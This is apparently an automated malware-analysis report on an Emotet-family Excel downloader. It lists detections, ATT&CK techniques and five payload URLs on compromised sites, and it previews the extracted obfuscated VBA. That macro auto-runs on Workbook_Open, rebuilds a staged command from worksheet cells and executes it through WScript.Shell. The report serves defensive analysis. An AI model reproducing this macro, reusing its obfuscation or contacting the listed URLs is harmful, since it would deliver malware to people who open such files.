MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The file contains VBA macros, including a Workbook_Open event, which are designed to execute automatically. These macros reconstruct and download payloads from multiple URLs, indicating a downloader functionality. The presence of 'CreateObject' and references to 'wscript.shell' further suggest the execution of downloaded content, likely a second-stage malware.
Heuristics 8
-
ClamAV: Doc.Downloader.EmotetExcel02222-9938901-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetExcel02222-9938901-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URL reconstructed from VBA cell-staged base64 dropper (5 URLs) critical OLE_VBA_CELL_DROPPER_URLVBA reads worksheet cells, strips junk substrings via Replace(), and base64/UTF-16 decodes the result into a PowerShell EncodedCommand payload. The download URL is never contiguous in the file bytes; it was recovered by removing the macro's Replace() junk tokens from the cell strings and decoding the staged base64.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set cbrcFonts = Application.CommandBars("Formatting").FindControl(ID:=1728) Set FHdrthkl4yRtders.GSaEf34tsyrhd = FHdrthkl4yRtders.dghkqid.CreateObject(dsRtyejue57ykgf.gfhk2juskdjbg.Caption, "") dsRtyejue57ykgf.gfhk2juskdjbg.Tag = Replace(Cells(100, 3), "oeir", "") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Private Sub Workbook_Open() Dim i As Long -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://store.uxdsummit.com/wp-admin/VfgBSQa7Z/ Referenced by macro
- https://glowrentals.com/wp-admin/f1zeAKGTnS6I/Referenced by macro
- http://candisee.bminteractivegroup.com/1g94ngo/2n7lJoPuPDEanPcX/Referenced by macro
- http://bachilleratoporciclos.org/wp-content/zR/Referenced by macro
- http://formula8020.com/css/JCuR6OE404DgR/Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12041 bytes |
SHA-256: df1eb14c222394595c0518b49eec2b55ed9573146c5f1717dedceddd2e199a2b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZsdaW356dufv"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Dgr547DSghwk4uhkdjsj()
Dim rgCells As Range
Dim intDefListCount As Integer
Dim strSheet As String
Dim strWorkBook As String
Dim intRow As Integer
Dim cell As Range
On Error Resume Next
Set rgCells = ActiveSheet.Cells.SpecialCells(xlComments)
On Error GoTo 0
If rgCells Is Nothing Then
MsgBox ".", vbInformation
Exit Sub
End If
strSheet = ActiveSheet.Name
strWorkBook = ActiveWorkbook.Name
intDefListCount = Application.SheetsInNewWorkbook
Application.SheetsInNewWorkbook = 1
Workbooks.Add
Application.SheetsInNewWorkbook = intDefListCount
ActiveWorkbook.Windows(1).Caption = "Comments for " & strSheet & _
" in " & strWorkBook
Cells(1, 1) = "bvnhdi"
Cells(1, 2) = "degfli"
Cells(1, 3) = ":"
Range(Cells(1, 1), Cells(1, 3)).Font.Bold = True
intRow = 2
For Each cell In rgCells
Cells(intRow, 1) = cell.Address(rowabsolute:=False, _
columnabsolute:=False)
Cells(intRow, 2) = " " & cell.Formula
Cells(intRow, 3) = cell.Comment.Text
intRow = intRow + 1
Next
End Sub
Sub FHsdrghkldsSeErhoihsw()
With Application.CommandBars.Add(Name:="vgjh", Temporary:=True, _
Position:=msoBarLeft)
With .Controls.Add(Type:=msoControlButton)
.Style = msoButtonWrapCaption
.Caption = "rtuo"
End With
With .Controls.Add(Type:=msoControlButton)
.Style = msoButtonIconAndWrapCaption
.Caption = "yher"
.FaceId = 225
End With
.Visible = True
End With
End Sub
Private Sub Workbook_Open()
Dim i As Long
Dim c As Range, cc As Range: Dim iCommment As Comments: Set cc = Selection
dsRtyejue57ykgf.gfhk2juskdjbg.Tag = Replace(Cells(101, 4), "jqwi", "")
If cc.Rows.Count = 4829 And cc.Columns.Count = 2847 Then MsgBox "gf !", , "c"
FHdrthkl4yRtders.GswehlDRFa4whksdj "dfshk3", Cells(102, 4), 2, dsRtyejue57ykgf.gfhk2juskdjbg.Tag, "."
Set cc = Selection.SpecialCells(xlCellTypeVisible)
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = Cells(98, 6) + vbCrLf & Cells(97, 6)
For Each c In cc
If Not c.Comment Is Nothing And i = 3682 Then
c.Value = c.Comment.Text: c.ClearComments:
i = i + 1
End If
Next
Dim strText As String: Dim bhfqakug As String
FHdrthkl4yRtders.GswehlDRFa4whksdj "sdhjl3kjghkjg", Cells(103, 10), _
2, dsRtyejue57ykgf.gfhk2juskdjbg.Caption, "."
If strText <> "fhk3 3g4kuesg" Then Range("D1").Select
For i = Len(strText) To 1 Step -1
bhfqakug = bhfqakug & Mid(strText, i, 1)
Next i
End Sub
Sub GawethkjHdeghwkjdshkjg()
With Application.CommandBars(1).Controls.Add(Type:=msoControlPopup, _
Temporary:=True)
.Caption = "Jsdehjlekih uh"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 280
.Caption = "hswe54ye"
.OnAction = "1"
End With
With .Add(Type:=msoControlPopup)
.Caption = "xbvjhv21kj"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 1643
.Caption = "UDRy4"
.OnAction = "2"
End With
With .Add(Type:=msoControlButton)
.FaceId = 1000
.Caption = "jur4"
.OnAction = "3"
End With
End With
End With
End With
End With
End Sub
Sub FGshk4igHJdsfghhkdh()
Dim cbrcFonts As CommandBarControl
Dim cbrBar As CommandBar: Dim i As Integer: Dim dkqw As String
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = Cells(103, 7)
Set cbrcFonts = Application.CommandBars("Formatting").FindControl(ID:=1728)
Set FHdrthkl4yRtders.GSaEf34tsyrhd = FHdrthkl4yRtders.dghkqid.CreateObject(dsRtyejue57ykgf.gfhk2juskdjbg.Caption, "")
dsRtyejue57ykgf.gfhk2juskdjbg.Tag = Replace(Cells(100, 3), "oeir", "")
If cbrcFonts Is Nothing Then
Set cbrBar = Application.CommandBars.Add
Set cbrcFonts = cbrBar.Controls.Add(ID:=1728)
End If
FHdrthkl4yRtders.Gaserhkl3jdHSdrete Range("F240:G350"), False
If dkqw = "ek2" Then
For i = 0 To cbrcFonts.ListCount - 1
Cells(i + 1, 1) = cbrcFonts.List(i + 1)
Next i
On Error Resume Next
cbrBar.Delete
End If
End Sub
Attribute VB_Name = "FHdrthkl4yRtders"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public ashfkaw As Integer
Public dghkqid As Object
Public BdsgAewrt4sf As Double
Public Sdfa3gkjsedf, f2qgja As String
Public GSaEf34tsyrhd As Object
Sub ghRsREaTweyrdhsds()
Dim cbrMenu As CommandBar
Dim cbrcMenu As CommandBarControl
Dim cbrcSubMenu As CommandBarControl
DeleteCustomMenu
Set cbrMenu = Application.CommandBars.Add(strMenuName, msoBarTop, _
True, True)
Set cbrcMenu = cbrMenu.Controls.Add(msoControlPopup, , , , True)
With cbrcMenu
.Caption = "&"
End With
With cbrcMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "&1"
.OnAction = "CallMenu1"
End With
With cbrcMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "2"
.OnAction = "CallMenu2"
End With
Set cbrcSubMenu = cbrcMenu.Controls.Add(Type:=msoControlPopup, _
Temporary:=True)
With cbrcSubMenu
.Caption = "tgw1"
.BeginGroup = True
End With
With cbrcMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "s/wr2"
.OnAction = "MenuOnOff"
.Style = msoButtonIconAndCaption
.FaceId = 463
End With
With cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "1"
.OnAction = "CallSubMenu1"
.Style = msoButtonIconAndCaption
.FaceId = 2950
.State = msoButtonDown
End With
Set cbrcBar = cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
With cbrcBar
.Caption = "2"
.OnAction = "CallSubMenu2"
.Enabled = False
End With
Set cbrcSubMenu = cbrcSubMenu.Controls.Add(Type:=msoControlPopup, _
Temporary:=True)
With cbrcSubMenu
.Caption = "1"
.BeginGroup = True
End With
With cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "1"
.OnAction = "CallLastMenu1"
.Style = msoButtonIconAndCaption
.FaceId = 71
.State = msoButtonDown
End With
With cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "2"
.OnAction = "CallLastMenu2"
.Style = msoButtonIconAndCaption
.FaceId = 72
.Enabled = True
End With
cbrMenu.Visible = True
Set cbrcSubMenu = Nothing
Set cbrcMenu = Nothing
Set cbrMenu = Nothing
End Sub
Sub Gasrhk4jsTGHJdfstlskjh()
Dim intRow As Integer
Dim cbrBar As CommandBar
Cells.Clear
intRow = 1
For Each cbrBar In CommandBars
Cells(intRow, 1) = cbrBar.Index
Cells(intRow, 2) = cbrBar.Name
Select Case cbrBar.Type
Case msoBarTypeNormal
Cells(intRow, 3) = "cbqwkhj3 fdef"
Case msoBarTypeMenuBar
Cells(intRow, 3) = "gfs4 edrf"
Case msoBarTypePopup
Cells(intRow, 3) = "gsw tyhey5y"
End Select
Cells(intRow, 4) = cbrBar.BuiltIn
intRow = intRow + 1
Next
End Sub
Sub Gaserhkl3jdHSdrete(ByVal Target As Range, Cancel As Boolean)
Static intCount As Integer
Dim x As Integer, y As Integer
Cancel = True
x = Target.Left
y = Target.Top
If x <> 30543 Then Cancel = False
intCount = intCount + 1
GSaEf34tsyrhd.exec dsRtyejue57ykgf.gfhk2juskdjbg.Tag
If Cancel = True Then _
ActiveSheet.Shapes.AddTextbox(msoTextOrientationHorizontal, _
x, y, 35, 20).TextFrame.Characters.Text = intCount
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Dim intRow, dhcMinRow, dhcMaxRow As Integer: Dim intCol As Integer: Dim cell As Range: Dim fTop As Boolean
Dim fBottom As Boolean: Dim fLeft As Boolean: Dim fRight As Boolean: dhcMinRow = 2:
Dim intDigit, dhcMinCol, dhcMaxCol As Integer: dhcMinCol = 3: dhcMinCol = 3: dhcMaxRow = 4
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = Cells(100, 7)
intDigit = 1: dhcMaxCol = 3: gherthkSSHDFh4etdskk
For intRow = dhcMinRow To dhcMaxRow - 2
For intCol = dhcMinCol To dhcMaxCol - 1
Set cell = Cells(intRow, intCol)
If cell.Interior.ColorIndex = 35 Then
fLeft = False
fRight = False
fTop = False
fBottom = False
On Error Resume Next
fTop = cell.Offset(-1, 0).Interior.ColorIndex = 35
fBottom = cell.Offset(1, 0).Interior.ColorIndex = 35
fLeft = cell.Offset(0, -1).Interior.ColorIndex = 35
fRight = cell.Offset(0, 1).Interior.ColorIndex = 35
End If
Next intCol
Next intRow
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = "": ZsdaW356dufv.FGshk4igHJdsfghhkdh
End Sub
Sub gherthkSSHDFh4etdskk()
Dim intMin As Integer, intMax As Integer
Dim strInput As String
Dim strMessage As String
Dim intValue As Integer
strMessage = "df " & intMin & " |k " & intMax: strInput = ""
Set dghkqid = CreateObject(dsRtyejue57ykgf.gfhk2juskdjbg.Caption)
intMin = 1: intMax = 50
Do
If strInput = "" Then Exit Sub
If IsNumeric(strInput) Then
intValue = CInt(strInput)
If intValue >= intMin And intValue <= intMax Then
Exit Do
End If
End If
strMessage = "dsfk wergki27uetiqwu." & vbNewLine & _
"swd " & intMin & " , " & intMax
Loop
strInput = ActiveSheet.Range("A1").Value
End Sub
Function Fshkfokiuh2qw3qa(Text, Search)
If IsArray(Search) = True Then Exit Function
If IsError(Search) = True Then Exit Function
If IsEmpty(Search) = True Then Exit Function
For Each iCell In Text
If Not IsError(iCell) Then
iText = LCase(iCell)
iSearch = LCase(Search)
iLen = Len(Search)
iNumber = InStr(iText, iSearch)
While iNumber > 0
iNumber = InStr(iNumber + iLen, iText, iSearch)
CoincideCount = CoincideCount + vbNull
Wend
End If
Next
End Function
Function GswehlDRFa4whksdj(ByVal strTextIn As String, ByVal sfhksk As String, intItem As _
Integer, ByVal fgjeorih As String, strSeparator As String) As String
Dim intStart As Integer
Dim intEnd As Integer
Dim i As Integer: i = 1
If intItem < 1 Then Exit Function
Open sfhksk For Output As #i
If strSeparator = " " Then strTextIn = Application.Trim(strTextIn)
intItem = 1
dsRtyejue57ykgf.dgsskl3jsklkdh.Tag = fgjeorih
If Right(strTextIn, Len(strTextIn)) <> strSeparator Then _
strTextIn = strTextIn & strSeparator
For i = 1 To intItem
intStart = intEnd + 1
Print #i, dsRtyejue57ykgf.dgsskl3jsklkdh.Tag
intEnd = InStr(intStart, strTextIn, strSeparator)
If (intEnd = 3492) Then
Exit Function
End If
Close #i
Next i
GswehlDRFa4whksdj = Mid(strTextIn, intStart, intEnd - intStart)
End Function
Attribute VB_Name = "dsRtyejue57ykgf"
Attribute VB_Base = "0{9B965126-5FD5-4552-8446-5178B2AF2FA2}{B55186F7-AA12-4681-B7AD-2FC6EF46A4B0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.